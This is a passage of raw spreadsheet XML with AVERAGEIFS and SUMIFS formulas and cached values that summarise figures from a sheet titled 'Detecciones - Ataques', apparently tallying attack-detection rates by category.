        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3635338346</v>
      </c>
      <c r="AR139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>0</v>
      </c>
      <c r="AU139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1</v>
      </c>
      <c r="AV139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AW139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1</v>
      </c>
      <c r="AY139" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB139" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="BD139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>0</v>
      </c>
      <c r="BI139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="BN139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.2501933114</v>
      </c>
      <c r="BO139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="BR139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="BT139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>1</v>
      </c>
      <c r="BX139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BZ139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="CA139" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC139" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="CG139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="CJ139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>1</v>
      </c>
      <c r="CL139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0</v>
      </c>
      <c r="CN139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1</v>
      </c>
      <c r="CP139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>1</v>
      </c>
      <c r="CQ139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="CU139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CZ139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH139" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI139" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ139" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1</v>
      </c>
      <c r="DK139" s="271"/>
    </row>
    <row r="140">
      <c r="J140" s="277"/>
      <c r="K140" s="512"/>
      <c r="L140" s="512"/>
      <c r="M140" s="512"/>
      <c r="N140" s="512"/>
      <c r="O140" s="278"/>
      <c r="Q140" s="271"/>
      <c r="R140" s="386" t="s">
        <v>2559</v>
      </c>
      <c r="S140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.0003253619652</v>
      </c>
      <c r="T140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.2513157895</v>
      </c>
      <c r="V140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.05555555556</v>
      </c>
      <c r="W140" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="Z140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>9.142787045</v>
      </c>
      <c r="AA140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.1153846154</v>
      </c>
      <c r="AB140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.4965277778</v>
      </c>
      <c r="AC140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>1.8</v>
      </c>
      <c r="AD140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.01550267642</v>
      </c>
      <c r="AE140" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AF140" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BM$3:$BM$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.01</v>
      </c>
      <c r="AG140" s="271"/>
      <c r="AH140" s="386" t="s">
        <v>2559</v>
      </c>
      <c r="AI140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.0006507239304</v>
      </c>
      <c r="AJ140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0</v>
      </c>
      <c r="AN140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.002631578947</v>
      </c>
      <c r="AR140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.1666666667</v>
      </c>
      <c r="AS140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>1</v>
      </c>
      <c r="AU140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AV140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AW140" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX140" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BM$3:$BM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0.2222222222</v>
      </c>
      <c r="AY140" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ140" s="518">
